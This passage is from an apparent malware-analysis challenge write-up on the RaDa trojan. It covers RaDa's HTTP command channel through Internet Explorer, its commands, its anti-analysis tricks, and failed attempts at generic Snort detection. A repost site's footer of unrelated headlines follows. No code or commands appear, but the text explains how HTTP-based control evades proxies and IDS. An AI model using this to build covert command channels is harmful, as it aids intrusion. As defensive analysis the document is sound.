It is very difficult to parse HTML even with a regular expression. Since Internet Explorer accepts a large amount of ways to write certain HTML, not necessarily accepting the HTML standards, so it is easy to bypass this regular expression. And that's beside the fact that names like 'get' and 'put' can be used by valid sites as well which will give some false positives. So we have to find a better rule. Let's watch at RaDa downloading something.

Finally we found something which can be useful. The boundary used for file transfers is hardcoded in RaDa and most likely won't give very much false positives, so the following rule can be used against RaDa

There are still some problems with this rule, only the download and upload requests will be detected, but the commandos like 'screenshot', 'exe' and 'sleep' can still be used without detection. We could use the rule which checks for the 'name='command'', but this rule is easy to bypass depending on how good you regular expression skills are ;-)

There is an other problem, a new version with another boundary will simply bypass this rule. Like the snort manual says: “catch the vulnerability, not the exploit”. But in this case the vulnerability is bypassing the firewall/IDS/proxy with a legal HTTP request so basically there is no vulnerability to speak of. It is almost impossible to find a rule against this sort of threat, at least we are not able to provide one.

We have thought about checking the amount of requests in a certain time period, but this would also give a lot of false positives, because people might check a website like Slashdot regulary or their e-mail checker makes a HTTP request every minute. The problem also works the other way around you can configure RaDa to only make one requests in very long time period, like a week. Which makes the detection by requests in a certain time period impossible.

Return to Table of contentsConclusionFrom all our findings in the process of exploring the binary we can conclude that this a new kind of trojan. That it silently installs itself in a directory, places an registry key to start itself and makes a process in the background. This gives it the main features of an trojan, but that doesn't make it special. The special part is the communication it uses. A trojan needs a way to communicate so it can take its commands. The trojans of today mainly use two ways of communication. The first way is that the trojan server opens a port to listen on, and the client connects on this port to send commands. There are many different ports being used for this. Almost each trojan has it's own port. The problem with this way is that the computer needs to be connected directly to the internet to be able to connect to it. And the open ports can easily be closed because they are on a specific port number. The second way that is being mainly used is to let the trojan connect to an IRC server as a bot and listen in the channel. The commands are then given by the trojan owner in the channel. The problem with this is that it almost always connects on port 6667 or another IRC port. Where this trojan makes the difference is that it uses a http server to get it's commands. This way it doesn't have the problems the other ways have. For HTTP is being used port 80, which is a very common port to be open and to see traffic on. Also many companies have this port open on every workstation in the building so the employees can get on the internet, usually by a proxy. And a proxy won't stop this trojan, because it a perfectly normal requests it does. So, this seems to be a trojan with a new way to get it's commands, and a dangerous way because it isn't easily stopped.

Return to Table of contentsAnswering the questionsQuestion 1: Identify and provide an overview of the binary, including the fundamental pieces of information that would help in identifying the same specimen.

The answer to question 1 can be found in the above analasis of the binary file

Question 2: Identify and explain the purpose of the binary.

This malware is designed to install on internal networks. When installed the malware contacts a webserver where he gets his commands. You only need Internet Explorer and an internet connection. It is designed to make use of Internet Explorer to send his HTTP-requests. So if Internet Explorer could connect to the outside world, RaDa can connect to the outside world. So companies which make use of proxy be aware.

Question 3: Identify and explain the different features of the binary. What are its capabilities?

The main feature of the binary is to act as a trojan. Get his commands from a webserver and run this commands on the machine. We have several commands: 'put', 'get', 'sleep', 'exe' and 'screenshot'. You can read in Commands which what command do.

You can also configure RaDa with several commandline options. A list of options and explaining wath they do can be watched in Commandline options

Question 4: Identify and explain the binary communication methods. Develop a Snort signature to detect this type of malware being as generic as possible, so other similar specimens could be detected, but avoiding at the same time a high false positives rate signature.

The binary connects to the commands webserver using Internet Explorer. It only communicates between Internet Explorer and the commands webserver. The best Snort Rule we could think of is:

But this rule only detects RaDa and not similar specimens, if they use another boundary. We thought about different kind of rules, but we couldn't find a generic rule which doesn't give false positives. So our answer to this question is: 'There isn't a snort rule which can stop this threat.'

More on Snort rules, see Creating a Snort Rule

Question 5: Identify and explain any techniques in the binary that protect it from being analyzed or reverse engineered.

The binary was packed with UPX and after that some values in the binary were changed. So it wasn't possible to unpack the binary. For more on unpacking, see Unpacking RaDa.

Also we saw some references to VMware in the assembly dump. We tried RaDa in a VMware environment, but almost everything worked the same. Except the --authors option which gives us an 'Unknown argument'.

In the assembly dump we saw a string about a Smurf attack. This string only gets pushed in edx and nothing is done with it. The string is there only to mislead us.

Question 6: Categorize this type of malware (virus, worm...) and justify your reasoning.

The binary can be best classified as a trojan. It doesn't have the intention to spread or infect other files. Once installed it only connects to a webserver to get his commands.

Question 7: Identify another tool that has demonstrated similar functionality in the past.

The Bagle worm also connected to a website to get some instructions

When the worm is started it connects to a list of predefined web servers and tries to access a PHP file with certain parameters. One of the parameters is the TCP port where the backdoor is listening which suggests that this functionality is used to collect the addresses of infected computers. Bagle has reportedly tried to download the Mitglieder trojan to some infected computers.F-Secure Virus Descriptions: Bagle

Question 8: Suggest detection and protection methods to fight against the threats introduced by this binary.

It's hard to fight against these threats. Especially if you don't want to ruin the internetconnection of your network users. You can build some snort rules to detect these kind of threats, by checking on uploading files or special commands send by 'name='command'', but that will give a lot of false positives.

Another option is to make a whitelist of internetsites which can be watched on your network. For companies this could be a usable solution. It also stops people watching porn during workhours ;).

However we couldn't find the perfect solution to this threat. We hope someone else can find a better solution.

Bonus Question 1: Is it possible to interrogate the binary about the person(s) who developed this tool? In what circumstances and under which conditions?

Yes, it is possible to find about the authors. You can simply use the --authors commandline option and will pop up a window with the names of the authors. Also the options --gui, --config and --usage gives you information about the authors.

However if you run RaDa in VMware with the --authors option it doesn't work and gives you an error.

Bonus Question 2: What advancements in tools with similar purposes can we expect in the near future?

In the near feature we can expect that these kinds of trojans will be used in the wild. Also networks of companies will be infected faster and the amount of DDOS networks will grow.

Also new viruses and worms will make use of this threat.

Return to Table of contents

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有